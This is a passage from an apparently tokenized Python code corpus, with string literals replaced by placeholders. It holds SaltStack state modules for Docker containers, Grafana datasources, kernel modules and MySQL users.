_ret_status ( out , name , changes = changes ) <EOL> return ret <EOL> def absent ( name ) : <EOL> '''<STR_LIT>''' <EOL> ins_container = __salt__ [ '<STR_LIT>' ] <EOL> cinfos = ins_container ( name ) <EOL> changes = { } <EOL> if cinfos [ '<STR_LIT:status>' ] : <EOL> cid = cinfos [ '<STR_LIT:id>' ] <EOL> changes [ cid ] = { } <EOL> is_running = __salt__ [ '<STR_LIT>' ] ( cid ) <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> comment = '<STR_LIT>' . format ( cid ) <EOL> return _ret_status ( name = name , comment = comment ) <EOL> if is_running : <EOL> changes [ cid ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> __salt__ [ '<STR_LIT>' ] ( cid ) <EOL> is_running = __salt__ [ '<STR_LIT>' ] ( cid ) <EOL> if is_running : <EOL> return _invalid ( comment = ( "<STR_LIT>" <EOL> . 
format ( cid ) ) ) <EOL> else : <EOL> __salt__ [ '<STR_LIT>' ] ( cid ) <EOL> is_gone = __salt__ [ '<STR_LIT>' ] ( cid ) <EOL> if is_gone : <EOL> return _valid ( comment = ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( cid ) ) , <EOL> changes = { name : True } ) <EOL> else : <EOL> return _valid ( comment = ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( cid ) ) , <EOL> changes = { name : True } ) <EOL> else : <EOL> __salt__ [ '<STR_LIT>' ] ( cid ) <EOL> is_gone = __salt__ [ '<STR_LIT>' ] ( cid ) <EOL> if is_gone : <EOL> return _valid ( comment = ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( cid ) ) , <EOL> changes = { name : True } ) <EOL> else : <EOL> return _valid ( comment = ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( cid ) ) , <EOL> changes = { name : True } ) <EOL> else : <EOL> return _valid ( comment = "<STR_LIT>" . format ( name ) ) <EOL> def present ( name , image = None , tag = '<STR_LIT>' , is_latest = False ) : <EOL> '''<STR_LIT>''' <EOL> ins_container = __salt__ [ '<STR_LIT>' ] <EOL> cinfos = ins_container ( name ) <EOL> if '<STR_LIT:id>' in cinfos : <EOL> cid = cinfos [ '<STR_LIT:id>' ] <EOL> else : <EOL> cid = name <EOL> if not cinfos [ '<STR_LIT:status>' ] : <EOL> return _invalid ( comment = '<STR_LIT>' . format ( cid or name ) ) <EOL> if cinfos [ '<STR_LIT:status>' ] and image is None : <EOL> return _valid ( comment = '<STR_LIT>' . format ( cid ) ) <EOL> image_name = _get_image_name ( image , tag ) <EOL> if cinfos [ '<STR_LIT:status>' ] and cinfos [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ "<STR_LIT>" ] == image_name and not is_latest : <EOL> return _valid ( comment = '<STR_LIT>' . format ( cid , image_name ) ) <EOL> ins_image = __salt__ [ '<STR_LIT>' ] <EOL> iinfos = ins_image ( image_name ) <EOL> if cinfos [ '<STR_LIT:status>' ] and cinfos [ '<STR_LIT>' ] [ '<STR_LIT>' ] == iinfos [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> return _valid ( comment = '<STR_LIT>' . format ( cid , image_name ) ) <EOL> return _invalid ( comment = '<STR_LIT>' . 
format ( cid or name ) ) <EOL> def run ( name , <EOL> cid = None , <EOL> hostname = None , <EOL> onlyif = None , <EOL> unless = None , <EOL> docked_onlyif = None , <EOL> docked_unless = None , <EOL> * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> if hostname : <EOL> salt . utils . warn_until ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> retcode = __salt__ [ '<STR_LIT>' ] <EOL> drun_all = __salt__ [ '<STR_LIT>' ] <EOL> valid = functools . partial ( _valid , name = name ) <EOL> if onlyif is not None : <EOL> if not isinstance ( onlyif , string_types ) : <EOL> if not onlyif : <EOL> return valid ( comment = '<STR_LIT>' ) <EOL> elif isinstance ( onlyif , string_types ) : <EOL> if not __salt__ [ '<STR_LIT>' ] ( onlyif ) == <NUM_LIT:0> : <EOL> return valid ( comment = '<STR_LIT>' ) <EOL> if unless is not None : <EOL> if not isinstance ( unless , string_types ) : <EOL> if unless : <EOL> return valid ( comment = '<STR_LIT>' ) <EOL> elif isinstance ( unless , string_types ) : <EOL> if __salt__ [ '<STR_LIT>' ] ( unless ) == <NUM_LIT:0> : <EOL> return valid ( comment = '<STR_LIT>' ) <EOL> if docked_onlyif is not None : <EOL> if not isinstance ( docked_onlyif , string_types ) : <EOL> if not docked_onlyif : <EOL> return valid ( comment = '<STR_LIT>' ) <EOL> elif isinstance ( docked_onlyif , string_types ) : <EOL> if not retcode ( cid , docked_onlyif ) : <EOL> return valid ( comment = '<STR_LIT>' ) <EOL> if docked_unless is not None : <EOL> if not isinstance ( docked_unless , string_types ) : <EOL> if docked_unless : <EOL> return valid ( comment = '<STR_LIT>' ) <EOL> elif isinstance ( docked_unless , string_types ) : <EOL> if retcode ( cid , docked_unless ) : <EOL> return valid ( comment = '<STR_LIT>' ) <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> comment = '<STR_LIT>' . 
format ( name , cid ) <EOL> return _ret_status ( name = name , comment = comment ) <EOL> result = drun_all ( cid , name ) <EOL> if result [ '<STR_LIT:status>' ] : <EOL> return valid ( comment = result [ '<STR_LIT>' ] ) <EOL> else : <EOL> return _invalid ( comment = result [ '<STR_LIT>' ] , name = name ) <EOL> def script ( * args , ** kw ) : <EOL> '''<STR_LIT>''' <EOL> raise NotImplementedError <EOL> def running ( name , <EOL> image , <EOL> tag = '<STR_LIT>' , <EOL> container = None , <EOL> command = None , <EOL> hostname = None , <EOL> user = None , <EOL> detach = True , <EOL> stdin_open = False , <EOL> tty = False , <EOL> mem_limit = None , <EOL> ports = None , <EOL> environment = None , <EOL> dns = None , <EOL> volumes = None , <EOL> volumes_from = None , <EOL> start = True , <EOL> cap_add = None , <EOL> cap_drop = None , <EOL> privileged = None , <EOL> lxc_conf = None , <EOL> network_mode = None , <EOL> check_is_running = True , <EOL> publish_all_ports = False , <EOL> links = None , <EOL> restart_policy = None , <EOL> cpu_shares = None , <EOL> cpuset = None , <EOL> kill_signal = None , <EOL> * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> if container is None : <EOL> container = name <EOL> ins_image = __salt__ [ '<STR_LIT>' ] <EOL> ins_container = __salt__ [ '<STR_LIT>' ] <EOL> create = __salt__ [ '<STR_LIT>' ] <EOL> image_name = _get_image_name ( image , tag ) <EOL> iinfos = ins_image ( image_name ) <EOL> image_exists = iinfos [ '<STR_LIT:status>' ] <EOL> if not image_exists : <EOL> return _invalid ( comment = '<STR_LIT>' . 
format ( image_name ) ) <EOL> cinfos = ins_container ( name ) <EOL> already_exists = cinfos [ '<STR_LIT:status>' ] <EOL> already_exists_with_same_image = ( <EOL> already_exists <EOL> and cinfos [ '<STR_LIT>' ] [ '<STR_LIT>' ] == iinfos [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> ) <EOL> is_running = __salt__ [ '<STR_LIT>' ] ( container ) <EOL> if already_exists_with_same_image and ( is_running or not start ) : <EOL> return _valid ( comment = '<STR_LIT>' . format ( name ) ) <EOL> if not already_exists_with_same_image and already_exists : <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> comment = '<STR_LIT>' . format ( name ) <EOL> return _ret_status ( name = name , comment = comment ) <EOL> if is_running : <EOL> stop_status = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if not stop_status [ '<STR_LIT:status>' ] : <EOL> return _invalid ( comment = '<STR_LIT>' . format ( name ) ) <EOL> remove_status = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if not remove_status [ '<STR_LIT:status>' ] : <EOL> return _invalid ( comment = '<STR_LIT>' . format ( name ) ) <EOL> already_exists = False <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> comment = '<STR_LIT>' . format ( name ) <EOL> return _ret_status ( name = name , comment = comment ) <EOL> exposeports , bindports , contvolumes , bindvolumes , denvironment , changes = [ ] , { } , [ ] , { } , { } , [ ] <EOL> if not ports : <EOL> ports = { } <EOL> if not volumes : <EOL> volumes = { } <EOL> if not volumes_from : <EOL> volumes_from = [ ] <EOL> if isinstance ( environment , dict ) : <EOL> for key in environment : <EOL> denvironment [ six . text_type ( key ) ] = six . text_type ( environment [ key ] ) <EOL> if isinstance ( environment , list ) : <EOL> for var in environment : <EOL> if isinstance ( var , dict ) : <EOL> for key in var : <EOL> denvironment [ six . text_type ( key ) ] = six . 
text_type ( var [ key ] ) <EOL> if isinstance ( volumes , dict ) : <EOL> bindvolumes = volumes <EOL> if isinstance ( volumes , list ) : <EOL> for vol in volumes : <EOL> if isinstance ( vol , dict ) : <EOL> source = list ( vol . keys ( ) ) [ <NUM_LIT:0> ] <EOL> if isinstance ( vol [ source ] , dict ) : <EOL> target = vol [ source ] [ '<STR_LIT>' ] <EOL> read_only = vol [ source ] . get ( '<STR_LIT>' , False ) <EOL> else : <EOL> target = str ( vol [ source ] ) <EOL> read_only = False <EOL> bindvolumes [ source ] = { '<STR_LIT>' : target , <EOL> '<STR_LIT>' : read_only <EOL> } <EOL> else : <EOL> contvolumes . append ( str ( vol ) ) <EOL> if isinstance ( ports , dict ) : <EOL> bindports = ports <EOL> if isinstance ( ports , list ) : <EOL> for port in ports : <EOL> if isinstance ( port , dict ) : <EOL> container_port = list ( port . keys ( ) ) [ <NUM_LIT:0> ] <EOL> if isinstance ( port [ container_port ] , dict ) : <EOL> host_port = port [ container_port ] [ '<STR_LIT>' ] <EOL> host_ip = port [ container_port ] . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> host_port = str ( port [ container_port ] ) <EOL> host_ip = '<STR_LIT>' <EOL> bindports [ container_port ] = { <EOL> '<STR_LIT>' : host_port , <EOL> '<STR_LIT>' : host_ip <EOL> } <EOL> else : <EOL> exposeports . 
append ( str ( port ) ) <EOL> parsed_volumes = _parse_volumes ( volumes ) <EOL> bindvolumes = parsed_volumes [ '<STR_LIT>' ] <EOL> contvolumes = parsed_volumes [ '<STR_LIT>' ] <EOL> if not already_exists : <EOL> kwargs = dict ( command = command , <EOL> hostname = hostname , <EOL> user = user , <EOL> detach = detach , <EOL> stdin_open = stdin_open , <EOL> tty = tty , <EOL> mem_limit = mem_limit , <EOL> ports = exposeports , <EOL> environment = denvironment , <EOL> dns = dns , <EOL> binds = bindvolumes , <EOL> volumes = contvolumes , <EOL> name = name , <EOL> cpu_shares = cpu_shares , <EOL> cpuset = cpuset ) <EOL> out = create ( image_name , ** kwargs ) <EOL> try : <EOL> cid = out [ '<STR_LIT>' ] [ '<STR_LIT:info>' ] [ '<STR_LIT:id>' ] <EOL> log . debug ( str ( cid ) ) <EOL> except Exception as e : <EOL> changes . append ( '<STR_LIT>' ) <EOL> log . debug ( str ( e ) ) <EOL> else : <EOL> changes . append ( '<STR_LIT>' . format ( cid ) ) <EOL> if start : <EOL> started = __salt__ [ '<STR_LIT>' ] ( name , <EOL> binds = bindvolumes , <EOL> port_bindings = bindports , <EOL> lxc_conf = lxc_conf , <EOL> publish_all_ports = publish_all_ports , <EOL> links = links , <EOL> privileged = privileged , <EOL> dns = dns , <EOL> volumes_from = volumes_from , <EOL> network_mode = network_mode , <EOL> restart_policy = restart_policy , <EOL> cap_add = cap_add , <EOL> cap_drop = cap_drop ) <EOL> if check_is_running : <EOL> is_running = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> log . debug ( "<STR_LIT>" + str ( started ) ) <EOL> log . debug ( "<STR_LIT>" + str ( is_running ) ) <EOL> if is_running : <EOL> changes . append ( '<STR_LIT>' . format ( name ) ) <EOL> else : <EOL> return _invalid ( comment = ( '<STR_LIT>' <EOL> . format ( name , started [ '<STR_LIT>' ] , ) ) ) <EOL> else : <EOL> changes . append ( '<STR_LIT>' . format ( name ) ) <EOL> return _valid ( comment = '<STR_LIT:\n>' . join ( changes ) , changes = { name : True } ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import requests <EOL> from salt . ext . six import string_types <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> return __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' , <NUM_LIT:1> ) == <NUM_LIT:2> <EOL> def present ( name , <EOL> type , <EOL> url , <EOL> access = '<STR_LIT>' , <EOL> user = '<STR_LIT>' , <EOL> password = '<STR_LIT>' , <EOL> database = '<STR_LIT>' , <EOL> basic_auth = False , <EOL> basic_auth_user = '<STR_LIT>' , <EOL> basic_auth_password = '<STR_LIT>' , <EOL> is_default = False , <EOL> json_data = None , <EOL> profile = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> if isinstance ( profile , string_types ) : <EOL> profile = __salt__ [ '<STR_LIT>' ] ( profile ) <EOL> ret = { '<STR_LIT:result>' : None , '<STR_LIT>' : None , '<STR_LIT>' : None } <EOL> datasource = _get_datasource ( profile , name ) <EOL> data = _get_json_data ( name , type , url , access , user , password , database , <EOL> basic_auth , basic_auth_user , basic_auth_password , is_default , json_data ) <EOL> if datasource : <EOL> requests . put ( <EOL> _get_url ( profile , datasource [ '<STR_LIT:id>' ] ) , <EOL> data , <EOL> headers = _get_headers ( profile ) , <EOL> timeout = profile . get ( '<STR_LIT>' , <NUM_LIT:3> ) , <EOL> ) <EOL> ret [ '<STR_LIT:result>' ] = True <EOL> ret [ '<STR_LIT>' ] = _diff ( datasource , data ) <EOL> if ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] or ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> else : <EOL> ret [ '<STR_LIT>' ] = None <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> else : <EOL> requests . post ( <EOL> '<STR_LIT>' . format ( profile [ '<STR_LIT>' ] ) , <EOL> data , <EOL> headers = _get_headers ( profile ) , <EOL> timeout = profile . get ( '<STR_LIT>' , <NUM_LIT:3> ) , <EOL> ) <EOL> ret [ '<STR_LIT:result>' ] = True <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . 
format ( name ) <EOL> ret [ '<STR_LIT>' ] = data <EOL> return ret <EOL> def absent ( name , profile = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> if isinstance ( profile , string_types ) : <EOL> profile = __salt__ [ '<STR_LIT>' ] ( profile ) <EOL> ret = { '<STR_LIT:result>' : None , '<STR_LIT>' : None , '<STR_LIT>' : None } <EOL> datasource = _get_datasource ( profile , name ) <EOL> if not datasource : <EOL> ret [ '<STR_LIT:result>' ] = True <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> requests . delete ( <EOL> _get_url ( profile , datasource [ '<STR_LIT:id>' ] ) , <EOL> headers = _get_headers ( profile ) , <EOL> timeout = profile . get ( '<STR_LIT>' , <NUM_LIT:3> ) , <EOL> ) <EOL> ret [ '<STR_LIT:result>' ] = True <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> def _get_url ( profile , datasource_id ) : <EOL> return '<STR_LIT>' . format ( <EOL> profile [ '<STR_LIT>' ] , <EOL> datasource_id <EOL> ) <EOL> def _get_datasource ( profile , name ) : <EOL> response = requests . get ( <EOL> '<STR_LIT>' . format ( profile [ '<STR_LIT>' ] ) , <EOL> headers = _get_headers ( profile ) , <EOL> timeout = profile . get ( '<STR_LIT>' , <NUM_LIT:3> ) , <EOL> ) <EOL> data = response . json ( ) <EOL> for datasource in data : <EOL> if datasource [ '<STR_LIT:name>' ] == name : <EOL> return datasource <EOL> return None <EOL> def _get_headers ( profile ) : <EOL> return { <EOL> '<STR_LIT>' : '<STR_LIT:application/json>' , <EOL> '<STR_LIT>' : '<STR_LIT>' . 
format ( profile [ '<STR_LIT>' ] ) <EOL> } <EOL> def _get_json_data ( name , <EOL> type , <EOL> url , <EOL> access = '<STR_LIT>' , <EOL> user = '<STR_LIT>' , <EOL> password = '<STR_LIT>' , <EOL> database = '<STR_LIT>' , <EOL> basic_auth = False , <EOL> basic_auth_user = '<STR_LIT>' , <EOL> basic_auth_password = '<STR_LIT>' , <EOL> is_default = False , <EOL> json_data = None ) : <EOL> return { <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT:type>' : type , <EOL> '<STR_LIT:url>' : url , <EOL> '<STR_LIT>' : access , <EOL> '<STR_LIT:user>' : user , <EOL> '<STR_LIT:password>' : password , <EOL> '<STR_LIT>' : database , <EOL> '<STR_LIT>' : basic_auth , <EOL> '<STR_LIT>' : basic_auth_user , <EOL> '<STR_LIT>' : basic_auth_password , <EOL> '<STR_LIT>' : is_default , <EOL> '<STR_LIT>' : json_data , <EOL> } <EOL> def _diff ( old , new ) : <EOL> old_keys = old . keys ( ) <EOL> old = old . copy ( ) <EOL> new = new . copy ( ) <EOL> for key in old_keys : <EOL> if key == '<STR_LIT:id>' or key == '<STR_LIT>' : <EOL> del old [ key ] <EOL> elif old [ key ] == new [ key ] : <EOL> del old [ key ] <EOL> del new [ key ] <EOL> return { '<STR_LIT>' : old , '<STR_LIT>' : new } </s>
<s> '''<STR_LIT>''' <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> return '<STR_LIT>' in __salt__ <EOL> def _append_comment ( ret , comment ) : <EOL> '''<STR_LIT>''' <EOL> if len ( ret [ '<STR_LIT>' ] ) : <EOL> ret [ '<STR_LIT>' ] = ret [ '<STR_LIT>' ] . rstrip ( ) + '<STR_LIT:\n>' + comment <EOL> else : <EOL> ret [ '<STR_LIT>' ] = comment <EOL> return ret <EOL> def present ( name , persist = False , mods = None ) : <EOL> '''<STR_LIT>''' <EOL> if not isinstance ( mods , ( list , tuple ) ) : <EOL> mods = [ name ] <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> loaded_mods = __salt__ [ '<STR_LIT>' ] ( ) <EOL> if persist : <EOL> persist_mods = __salt__ [ '<STR_LIT>' ] ( True ) <EOL> loaded_mods = list ( set ( loaded_mods ) & set ( persist_mods ) ) <EOL> already_loaded = list ( set ( loaded_mods ) & set ( mods ) ) <EOL> if len ( already_loaded ) == <NUM_LIT:1> : <EOL> comment = '<STR_LIT>' . format ( already_loaded [ <NUM_LIT:0> ] ) <EOL> _append_comment ( ret , comment ) <EOL> elif len ( already_loaded ) > <NUM_LIT:1> : <EOL> comment = '<STR_LIT>' . format ( '<STR_LIT:U+002CU+0020>' . join ( already_loaded ) ) <EOL> _append_comment ( ret , comment ) <EOL> if len ( already_loaded ) == len ( mods ) : <EOL> return ret <EOL> not_loaded = list ( set ( mods ) - set ( already_loaded ) ) <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> if len ( ret [ '<STR_LIT>' ] ) : <EOL> ret [ '<STR_LIT>' ] += '<STR_LIT:\n>' <EOL> if len ( not_loaded ) == <NUM_LIT:1> : <EOL> comment = '<STR_LIT>' . format ( not_loaded [ <NUM_LIT:0> ] ) <EOL> else : <EOL> comment = '<STR_LIT>' . format ( '<STR_LIT:U+002CU+0020>' . 
join ( not_loaded ) ) <EOL> _append_comment ( ret , comment ) <EOL> return ret <EOL> unavailable = list ( set ( not_loaded ) - set ( __salt__ [ '<STR_LIT>' ] ( ) ) ) <EOL> if unavailable : <EOL> if len ( unavailable ) == <NUM_LIT:1> : <EOL> comment = '<STR_LIT>' . format ( unavailable [ <NUM_LIT:0> ] ) <EOL> else : <EOL> comment = '<STR_LIT>' . format ( '<STR_LIT:U+002CU+0020>' . join ( unavailable ) ) <EOL> _append_comment ( ret , comment ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> available = list ( set ( not_loaded ) - set ( unavailable ) ) <EOL> loaded = { '<STR_LIT:yes>' : [ ] , '<STR_LIT>' : [ ] , '<STR_LIT>' : [ ] } <EOL> for mod in available : <EOL> load_result = __salt__ [ '<STR_LIT>' ] ( mod , persist ) <EOL> if isinstance ( load_result , ( list , tuple ) ) : <EOL> if len ( load_result ) > <NUM_LIT:0> : <EOL> for module in load_result : <EOL> ret [ '<STR_LIT>' ] [ module ] = '<STR_LIT>' <EOL> loaded [ '<STR_LIT:yes>' ] . append ( mod ) <EOL> else : <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> loaded [ '<STR_LIT>' ] . append ( mod ) <EOL> else : <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> loaded [ '<STR_LIT>' ] . append ( [ mod , load_result ] ) <EOL> if len ( loaded [ '<STR_LIT:yes>' ] ) == <NUM_LIT:1> : <EOL> _append_comment ( ret , '<STR_LIT>' . format ( loaded [ '<STR_LIT:yes>' ] [ <NUM_LIT:0> ] ) ) <EOL> elif len ( loaded [ '<STR_LIT:yes>' ] ) > <NUM_LIT:1> : <EOL> _append_comment ( ret , '<STR_LIT>' . format ( '<STR_LIT:U+002CU+0020>' . join ( loaded [ '<STR_LIT:yes>' ] ) ) ) <EOL> if len ( loaded [ '<STR_LIT>' ] ) == <NUM_LIT:1> : <EOL> _append_comment ( ret , '<STR_LIT>' . format ( loaded [ '<STR_LIT>' ] [ <NUM_LIT:0> ] ) ) <EOL> if len ( loaded [ '<STR_LIT>' ] ) > <NUM_LIT:1> : <EOL> _append_comment ( ret , '<STR_LIT>' . format ( '<STR_LIT:U+002CU+0020>' . join ( loaded [ '<STR_LIT>' ] ) ) ) <EOL> if len ( loaded [ '<STR_LIT>' ] ) : <EOL> for mod , msg in loaded [ '<STR_LIT>' ] : <EOL> _append_comment ( ret , '<STR_LIT>' . 
format ( mod , msg ) ) <EOL> return ret <EOL> def absent ( name , persist = False , comment = True , mods = None ) : <EOL> '''<STR_LIT>''' <EOL> if not isinstance ( mods , ( list , tuple ) ) : <EOL> mods = [ name ] <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> loaded_mods = __salt__ [ '<STR_LIT>' ] ( ) <EOL> if persist : <EOL> persist_mods = __salt__ [ '<STR_LIT>' ] ( True ) <EOL> loaded_mods = list ( set ( loaded_mods ) | set ( persist_mods ) ) <EOL> to_unload = list ( set ( mods ) & set ( loaded_mods ) ) <EOL> if to_unload : <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> if len ( to_unload ) == <NUM_LIT:1> : <EOL> _append_comment ( ret , '<STR_LIT>' . format ( to_unload [ <NUM_LIT:0> ] ) ) <EOL> elif len ( to_unload ) > <NUM_LIT:1> : <EOL> _append_comment ( ret , '<STR_LIT>' . format ( '<STR_LIT:U+002CU+0020>' . join ( to_unload ) ) ) <EOL> return ret <EOL> unloaded = { '<STR_LIT:yes>' : [ ] , '<STR_LIT>' : [ ] , '<STR_LIT>' : [ ] } <EOL> for mod in to_unload : <EOL> unload_result = __salt__ [ '<STR_LIT>' ] ( mod , persist , comment ) <EOL> if isinstance ( unload_result , ( list , tuple ) ) : <EOL> if len ( unload_result ) > <NUM_LIT:0> : <EOL> for module in unload_result : <EOL> ret [ '<STR_LIT>' ] [ module ] = '<STR_LIT>' <EOL> unloaded [ '<STR_LIT:yes>' ] . append ( mod ) <EOL> else : <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> unloaded [ '<STR_LIT>' ] . append ( mod ) <EOL> else : <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> unloaded [ '<STR_LIT>' ] . append ( [ mod , unload_result ] ) <EOL> if len ( unloaded [ '<STR_LIT:yes>' ] ) == <NUM_LIT:1> : <EOL> _append_comment ( ret , '<STR_LIT>' . format ( unloaded [ '<STR_LIT:yes>' ] [ <NUM_LIT:0> ] ) ) <EOL> elif len ( unloaded [ '<STR_LIT:yes>' ] ) > <NUM_LIT:1> : <EOL> _append_comment ( ret , '<STR_LIT>' . format ( '<STR_LIT:U+002CU+0020>' . 
join ( unloaded [ '<STR_LIT:yes>' ] ) ) ) <EOL> if len ( unloaded [ '<STR_LIT>' ] ) == <NUM_LIT:1> : <EOL> _append_comment ( ret , '<STR_LIT>' . format ( unloaded [ '<STR_LIT>' ] [ <NUM_LIT:0> ] ) ) <EOL> if len ( unloaded [ '<STR_LIT>' ] ) > <NUM_LIT:1> : <EOL> _append_comment ( ret , '<STR_LIT>' . format ( '<STR_LIT:U+002CU+0020>' . join ( unloaded [ '<STR_LIT>' ] ) ) ) <EOL> if len ( unloaded [ '<STR_LIT>' ] ) : <EOL> for mod , msg in unloaded [ '<STR_LIT>' ] : <EOL> _append_comment ( ret , '<STR_LIT>' . format ( mod , msg ) ) <EOL> return ret <EOL> else : <EOL> if len ( mods ) == <NUM_LIT:1> : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( mods [ <NUM_LIT:0> ] ) <EOL> else : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( '<STR_LIT:U+002CU+0020>' . join ( mods ) ) <EOL> return ret </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import sys <EOL> import salt . utils <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> return '<STR_LIT>' in __salt__ <EOL> def _get_mysql_error ( ) : <EOL> '''<STR_LIT>''' <EOL> return sys . modules [ <EOL> __salt__ [ '<STR_LIT>' ] . __module__ <EOL> ] . __context__ . pop ( '<STR_LIT>' , None ) <EOL> def present ( name , <EOL> host = '<STR_LIT:localhost>' , <EOL> password = None , <EOL> password_hash = None , <EOL> allow_passwordless = False , <EOL> unix_socket = False , <EOL> password_column = '<STR_LIT>' , <EOL> ** connection_args ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' . format ( name , host ) } <EOL> passwordless = not any ( ( password , password_hash ) ) <EOL> if passwordless : <EOL> if not salt . utils . is_true ( allow_passwordless ) : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> else : <EOL> if __salt__ [ '<STR_LIT>' ] ( name , host , passwordless = True , unix_socket = unix_socket , password_column = password_column , <EOL> ** connection_args ) : <EOL> ret [ '<STR_LIT>' ] += '<STR_LIT>' <EOL> return ret <EOL> else : <EOL> err = _get_mysql_error ( ) <EOL> if err is not None : <EOL> ret [ '<STR_LIT>' ] = err <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> else : <EOL> if __salt__ [ '<STR_LIT>' ] ( name , host , password , password_hash , unix_socket = unix_socket , password_column = password_column , <EOL> ** connection_args ) : <EOL> ret [ '<STR_LIT>' ] += '<STR_LIT>' <EOL> if password_hash and not password : <EOL> ret [ '<STR_LIT>' ] += '<STR_LIT>' <EOL> return ret <EOL> else : <EOL> err = _get_mysql_error ( ) <EOL> if err is not None : <EOL> ret [ '<STR_LIT>' ] = err <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> if __salt__ [ '<STR_LIT>' ] ( name , host , 
unix_socket = unix_socket , ** connection_args ) : <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name , host ) <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> if passwordless : <EOL> ret [ '<STR_LIT>' ] += '<STR_LIT>' <EOL> if not salt . utils . is_true ( allow_passwordless ) : <EOL> ret [ '<STR_LIT>' ] += '<STR_LIT>' <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> else : <EOL> ret [ '<STR_LIT>' ] += '<STR_LIT>' <EOL> return ret <EOL> if __salt__ [ '<STR_LIT>' ] ( name , host , <EOL> password , password_hash , <EOL> allow_passwordless , unix_socket , <EOL> ** connection_args ) : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' . format ( name , host , <EOL> '<STR_LIT>' if passwordless else '<STR_LIT>' ) <EOL> ret [ '<STR_LIT>' ] [ name ] = '<STR_LIT>' <EOL> else : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' . format ( '<STR_LIT>' if passwordless else '<STR_LIT>' , <EOL> name , host ) <EOL> err = _get_mysql_error ( ) <EOL> if err is not None : <EOL> ret [ '<STR_LIT>' ] += '<STR_LIT>' . format ( err ) <EOL> if passwordless and not salt . utils . is_true ( allow_passwordless ) : <EOL> ret [ '<STR_LIT>' ] += '<STR_LIT>' '<STR_LIT>' <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> else : <EOL> err = _get_mysql_error ( ) <EOL> if err is not None : <EOL> ret [ '<STR_LIT>' ] = err <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name , host ) <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> if passwordless : <EOL> ret [ '<STR_LIT>' ] += '<STR_LIT>' <EOL> if not salt . utils . 
